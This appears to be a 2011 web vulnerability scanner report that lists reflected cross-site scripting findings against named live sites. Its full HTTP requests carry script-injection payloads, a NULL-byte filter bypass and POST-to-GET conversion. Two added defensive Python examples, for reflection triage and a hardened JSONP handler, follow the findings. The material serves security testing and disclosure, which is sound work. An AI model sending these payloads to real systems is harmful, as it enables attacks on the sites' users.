GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e4345753ffef<img%20src%3da%20onerror%3dalert(1)>0560571b3eb/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:09 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56534
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 33b85<img%20src%3da%20onerror%3dalert(1)>c54be653d5e was submitted in the REST URL parameter 8. This input was echoed as 33b85<img src=a onerror=alert(1)>c54be653d5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http:33b85<img%20src%3da%20onerror%3dalert(1)>c54be653d5e//at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:16 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 37922<img%20src%3da%20onerror%3dalert(1)>f402d1ff062 was submitted in the REST URL parameter 9. This input was echoed as 37922<img src=a onerror=alert(1)>f402d1ff062 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com37922<img%20src%3da%20onerror%3dalert(1)>f402d1ff062/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Sun, 27 Feb 2011 16:46:20 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526
3.33. https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6855a--><script>alert(1)</script>bc4102ec8a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start?ProductRef=jdk-6u24-oth-JPR@CDS-CDS_Developer&6855a--><script>alert(1)</script>bc4102ec8a7=1 HTTP/1.1 Host: cds.sun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loo ...[SNIP]... elimiter="&" parametername="goto" currenturl="https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start?ProductRef=jdk-6u24-oth-JPR@CDS-CDS_Developer&6855a--><script>alert(1)</script>bc4102ec8a7=1&ProductUUID=pGqJ_hCwj_AAAAEtB8oADqmS&ProductID=pGqJ_hCwj_AAAAEtB8oADqmS&Origin=ViewProductDetail-Start" --> ...[SNIP]...
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b192"><script>alert(1)</script>32cca89645832eced was submitted in the email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, but it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %0070e78<a>271d7883f11 was submitted in the REST URL parameter 1. This input was echoed as 70e78<a>271d7883f11 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /weblog%0070e78<a>271d7883f11/2006/03/faster HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:07 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1644 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dcea7"><script>alert(1)</script>512fbcc591d was submitted in the REST URL parameter 1. This input was echoed as dcea7"><script>alert(1)</script>512fbcc591d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /weblog%00dcea7"><script>alert(1)</script>512fbcc591d/2006/03/faster HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:06 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1790 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c01ec<a>2a3ca83c34f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/03/fasterc01ec<a>2a3ca83c34f HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:17 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php Expires: Sat, 26 Feb 2011 23:20:17 GMT Last-Modified: Sat, 26 Feb 2011 23:20:17 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1352 Connection: close Content-Type: text/html; charset=UTF-8
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00fa627<a>784e947c10e was submitted in the REST URL parameter 1. This input was echoed as fa627<a>784e947c10e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /weblog%00fa627<a>784e947c10e/2006/06/again/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:50 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1644 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0078f44"><script>alert(1)</script>c42523ab52d was submitted in the REST URL parameter 1. This input was echoed as 78f44"><script>alert(1)</script>c42523ab52d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /weblog%0078f44"><script>alert(1)</script>c42523ab52d/2006/06/again/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:49 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1790 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f526a<a>bc4d18aee79 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/06/againf526a<a>bc4d18aee79/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:21:27 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php Expires: Sat, 26 Feb 2011 23:21:28 GMT Last-Modified: Sat, 26 Feb 2011 23:21:28 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1352 Connection: close Content-Type: text/html; charset=UTF-8
3.41. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://dean.edwards.name
Path: /weblog/2006/06/again/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8539"><script>alert(1)</script>90e6230aa36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d8539\"><script>alert(1)</script>90e6230aa36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The quotation mark came back prefixed with a backslash, which is string escaping for a JavaScript or SQL context and has no meaning inside an HTML attribute: the browser still ends the attribute value at the quote, so the PoC works unchanged.
Request
GET /weblog/2006/06/again/?d8539"><script>alert(1)</script>90e6230aa36=1 HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 954f9"><x%20style%3dx%3aexpression(alert(1))>935c7211ee2 was submitted in the key parameter. This input was echoed as 954f9"><x style=x:expression(alert(1))>935c7211ee2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (CSS expressions are not evaluated in IE8 standards mode and later), and may not work on other browsers; a plain "><script> or event-handler payload should be tried to confirm the finding is not browser-dependent.
Request
GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542954f9"><x%20style%3dx%3aexpression(alert(1))>935c7211ee2&partnerref=ocom&sourcepage=register HTTP/1.1 Host: event.on24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:29:57 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=rTgXMMJ19hpxRmQBeHTZpBSHLmdhQwpUS9D079bkV7zEURAZjdB9!865718048; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close
<!-- optional parameters cb : leave blank to hide logo, or pass in appropriate cb value topmargin - default is 20 leftmargin ...[SNIP]... <input type="hidden" name="key" value="453849B62CAB589517473EC368BF9542954f9"><x style=x:expression(alert(1))>935c7211ee2"> ...[SNIP]...
The value of the partnerref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c8f"><x%20style%3dx%3aexpression(alert(1))>81a40639315 was submitted in the partnerref parameter. This input was echoed as 99c8f"><x style=x:expression(alert(1))>81a40639315 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542&partnerref=ocom99c8f"><x%20style%3dx%3aexpression(alert(1))>81a40639315&sourcepage=register HTTP/1.1 Host: event.on24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:08 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=7cDI022cgrDsLBgCWczqE6wL9UAd4cjBPhMG2cmQDAsmDcV7RZYq!-1586332666; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close
<!-- optional parameters cb : leave blank to hide logo, or pass in appropriate cb value topmargin - default is 20 leftmargin ...[SNIP]... <input type="hidden" name="partnerref" value="ocom99c8f"><x style=x:expression(alert(1))>81a40639315"> ...[SNIP]...
The value of the sourcepage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab0db"><x%20style%3dx%3aexpression(alert(1))>113da7be2a3 was submitted in the sourcepage parameter. This input was echoed as ab0db"><x style=x:expression(alert(1))>113da7be2a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542&partnerref=ocom&sourcepage=registerab0db"><x%20style%3dx%3aexpression(alert(1))>113da7be2a3 HTTP/1.1 Host: event.on24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:17 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=62BqOkDMbxlMQz6LJa9JVd0qcMfDA1sqzBfibypGJraqoBW2Rf32!-1281997819; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close
<!-- optional parameters cb : leave blank to hide logo, or pass in appropriate cb value topmargin - default is 20 leftmargin ...[SNIP]... <input type="hidden" name="sourcepage" value="registerab0db"><x style=x:expression(alert(1))>113da7be2a3"> ...[SNIP]...
The value of the mID request parameter is copied into the HTML document as plain text between tags. The payload eb22e<script>alert(1)</script>85708136ac4ac84a6 was submitted in the mID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note, however, that the body returned (below) is JSON and the response carries no Content-Type header at all, so whether a browser renders the injected markup depends on it sniffing the body as HTML; the fix is to declare application/json and add X-Content-Type-Options: nosniff in addition to encoding the value.
The original request used the POST method, but it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver.
Request
GET /register?swfVer=2371&sk=4300947c68314c1251174fbec281db2c179656ed&ua=Mozilla%2F5%2E0%20%28Windows%3B%20U%3B%20Windows%20NT%206%2E1%3B%20en%2DUS%29%20AppleWebKit%2F534%2E13%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F9%2E0%2E597%2E98%20Safari%2F534%2E13&jsVer=0%2E4%2E0&mID=gLAMf6t1oQdRZ9pJbWZsb367xnR0jSnYeb22e<script>alert(1)</script>85708136ac4ac84a6&ref=http%3A%2F%2Fwww%2Ethedetroitbureau%2Ecom%2Fabout%2Dus%2F&tabId=%5Fflash%5F28853bf0ac29099fa00d4de19cf16898206ee90c&accountKey=zNGIkGNBzGwfX48wS7PchwQECOzEXOCT&ak=zNGIkGNBzGwfX48wS7PchwQECOzEXOCT&title=SEO%20Company%20USA%2C%20Michigan%20Web%20Design%20Services%2C%20Print%20Design%2C%20Flash%20Designing%2C%20Website%20design%20Companies%20Novi%2C%20E%2DCommerce%20Designer&url=http%3A%2F%2Fwww%2Esti%2Dcs%2Ecom%2F HTTP/1.1 Host: init.zopim.com Proxy-Connection: keep-alive Referer: http://zopim.com/swf/ZClientController.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 26 Feb 2011 20:42:18 GMT Connection: keep-alive Content-Length: 856
{"status": "offline", "__status": "ok", "name": "Visitor 210780399", "settings": {"chatbutton": {"position": "br", "theme": "bar"}, "greetings": {"away": {"window": "If you leave a question or comment ...[SNIP]... Leave a message"}, "online": {"window": "Leave a question or comment and our agents will try to attend to you shortly =)", "bar": "Click here to chat"}}}, "machineID": "gLAMf6t1oQdRZ9pJbWZsb367xnR0jSnYeb22e<script>alert(1)</script>85708136ac4ac84a6", "nick": "visitor:210780399", "host": "lc03.zopim.com", "chat": {"members": [], "history": []}, "sid": "dFAqD1Ku9sANzup4iVjoZlanIFmiEk6o8QAQLwDi", "evt": 0, "email": ""}
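Every finding in this section uses the same method: a probe wrapped in a random prefix and suffix is submitted, the response is searched for the canary pair, and what came back between them tells you whether the characters were reflected unmodified, HTML-encoded or backslash-escaped, while the surrounding markup gives the context (between tags, inside a double-quoted attribute, inside an HTML comment). The zopim response above adds one more check worth automating: the declared Content-Type decides whether any of this renders as HTML. The following Python is an added example of that triage step, not Burp's or any vendor's code; the sample responses are constructed to mirror the report's snippets and are not captured traffic.

```python
import html
import re
from typing import Optional

# Canary-wrapped probe in the style of the report: a random prefix and suffix
# bracket the hostile characters, so the reflection is easy to locate and the
# text between the canaries shows exactly what the application did to them.
PREFIX, SUFFIX = "33b85", "c54be653d5e"
PROBE = '"><script>alert(1)</script>'
PAYLOAD = PREFIX + PROBE + SUFFIX


def find_reflection(body: str) -> Optional[str]:
    """Return whatever sits between PREFIX and SUFFIX in body, or None if the
    canary pair did not come back at all."""
    m = re.search(re.escape(PREFIX) + r"(.*?)" + re.escape(SUFFIX), body, re.S)
    return m.group(1) if m else None


def transformation(echoed: str) -> str:
    """Compare the echoed probe with what was sent."""
    if echoed == PROBE:
        return "unmodified"
    if echoed == html.escape(PROBE, quote=True):
        return "html-encoded"
    if echoed == PROBE.replace('"', '\\"'):
        # JS/SQL-style string escaping; an HTML attribute still ends at the quote
        return "backslash-escaped"
    return "altered"


def context(body: str) -> str:
    """Classify the HTML context at the reflection point from the raw text that
    precedes the canary prefix. A heuristic, not an HTML parser."""
    before = body[: body.find(PREFIX)]
    open_comment = before.rfind("<!--")
    if open_comment != -1 and before.find("-->", open_comment) == -1:
        return "html-comment"
    last_lt, last_gt = before.rfind("<"), before.rfind(">")
    if last_lt > last_gt:
        # still inside a tag; an odd number of quotes means an open attribute value
        if before[last_lt:].count('"') % 2 == 1:
            return "double-quoted-attribute"
        return "inside-tag"
    return "text-between-tags"


def renders_as_html(headers: dict) -> str:
    """Does the declared Content-Type let a browser treat the body as HTML?"""
    ct = headers.get("Content-Type", "").lower()
    if ct.startswith(("text/html", "application/xhtml+xml")):
        return "yes"
    if not ct:
        return "sniffing-dependent"  # no Content-Type: the browser may sniff the body as HTML
    return "no"


def assess(headers: dict, body: str) -> dict:
    echoed = find_reflection(body)
    if echoed is None:
        return {"reflected": False}
    return {
        "reflected": True,
        "echoed": echoed,
        "transformation": transformation(echoed),
        "context": context(body),
        "renders_as_html": renders_as_html(headers),
    }


# Constructed responses modelled on the report's snippets (not captured traffic).
SAMPLES = {
    "attribute": ({"Content-Type": "text/html; charset=utf-8"},
                  '<form><input type="hidden" name="key" value="453849B62CAB5895' + PAYLOAD + '"></form>'),
    "comment": ({"Content-Type": "text/html;charset=UTF-8"},
                '<html><head><!--!esi:include src="/store?' + PAYLOAD + '=1&Action=DisplayESIPage"--></head></html>'),
    "json_no_type": ({},
                     '{"status": "offline", "machineID": "gLAMf6t1oQ' + PAYLOAD + '", "nick": "visitor"}'),
    "backslash": ({"Content-Type": "text/html"},
                  '<a href="/weblog/?' + PREFIX + PROBE.replace('"', '\\"') + SUFFIX + '=1">again</a>'),
    "encoded": ({"Content-Type": "text/html"},
                "<p>" + PREFIX + html.escape(PROBE, quote=True) + SUFFIX + "</p>"),
}

if __name__ == "__main__":
    for name, (headers, body) in SAMPLES.items():
        print(f"{name:13s} {assess(headers, body)}")
```

The context heuristic only looks backwards from the reflection point, which is enough to reproduce the three contexts named in this report; a real scanner would parse the whole document. The "sniffing-dependent" verdict is the one to watch for on JSON and script endpoints: it means the finding is real but browser-specific until the server declares a Content-Type and X-Content-Type-Options: nosniff.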
The value of the vid request parameter is copied into the HTML document as plain text between tags. The payload a35d3<img%20src%3da%20onerror%3dalert(1)>e181c272a5 was submitted in the vid parameter. This input was echoed as a35d3<img src=a onerror=alert(1)>e181c272a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /webrecorder/g/chimera.js?vid=nulla35d3<img%20src%3da%20onerror%3dalert(1)>e181c272a5 HTTP/1.1 Host: lfov.net Proxy-Connection: keep-alive Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Coyote-2-405e0b67=405e0b12:0
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c68ad<script>alert(1)</script>2366c191886 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /utils/get?url=http%3A%2F%2Fioerror.us%2F2008%2F08%2F07%2Ffinal-pictures-from-duncannon-pa%2F&srcUrl=http%3A%2F%2Fioerror.us%2Ffeed%2F&callback=outbrain_rater.returnedOdbData(${json},0)c68ad<script>alert(1)</script>2366c191886&settings=true&recs=true&widgetJSId=NA&key=AYQHSUWJ8576&idx=0&version=34924&ref=&apv=false&rand=0.05641490779817104&sig=RKWTKL3v HTTP/1.1 Host: odb.outbrain.com Proxy-Connection: keep-alive Referer: http://ioerror.us/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: obuid=0e0ed3f9-f76f-4651-916d-b47532550304; _lvd2="p47tkLgO+tdtgtEB03I2oA=="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; _lvs2="23sEltQMc/A="
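The callback reflection above is the classic JSONP failure: the parameter becomes the start of the script body, so whatever the endpoint accepts in it executes in every page that includes the script. As an added example (not Outbrain's code; the handler, the data and the treatment of the service's ${json} template convention are assumptions), a hardened JSONP handler in Python that accepts only a dotted JavaScript identifier, pads the body with a leading comment and declares a nosniff script Content-Type. Under this design the returnedOdbData(${json},0) form seen in the request would have to become a plain callback name, with any extra arguments fixed on the server side.

```python
import json
import re

# Allow-list for a JSONP callback: a dotted JavaScript identifier and nothing
# else. Parentheses, quotes, '<', '$' templates and whitespace are all rejected,
# so the callback can neither close the script context nor carry markup.
CALLBACK_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)*$")
MAX_CALLBACK_LEN = 64


def valid_callback(name: str) -> bool:
    return 0 < len(name) <= MAX_CALLBACK_LEN and CALLBACK_RE.match(name) is not None


def jsonp_response(callback: str, data: dict):
    """Build (status, headers, body) for a hardened JSONP endpoint (assumed API)."""
    nosniff = {"X-Content-Type-Options": "nosniff"}
    if not valid_callback(callback):
        return 400, {"Content-Type": "text/plain; charset=utf-8", **nosniff}, "invalid callback"
    # json.dumps with the default ensure_ascii=True leaves no raw U+2028/U+2029
    # or other non-ASCII characters in the script body; '</' is additionally
    # escaped as defence in depth in case the same body is ever inlined in HTML.
    payload = json.dumps(data).replace("</", "<\\/")
    # The leading comment means the response can never start with attacker-chosen
    # bytes, which blocks Flash-style abuse of JSONP endpoints as file carriers.
    body = f"/**/ {callback}({payload});"
    headers = {"Content-Type": "application/javascript; charset=utf-8", **nosniff}
    return 200, headers, body


if __name__ == "__main__":
    # Constructed inputs: the report's benign callback and its injected variant.
    for cb in ("outbrain_rater.returnedOdbData",
               "outbrain_rater.returnedOdbData(${json},0)c68ad<script>alert(1)</script>2366c191886"):
        print(cb[:40], "->", jsonp_response(cb, {"recs": []})[0])
```

The identifier check is the control that matters; the comment prefix and nosniff header are cheap additions that close the remaining ways a JSONP response gets interpreted as something other than script.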
3.48. https://shop.winamp.com/DRHM/store [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: https://shop.winamp.com
Path: /DRHM/store
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 94384-->4321560c01e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
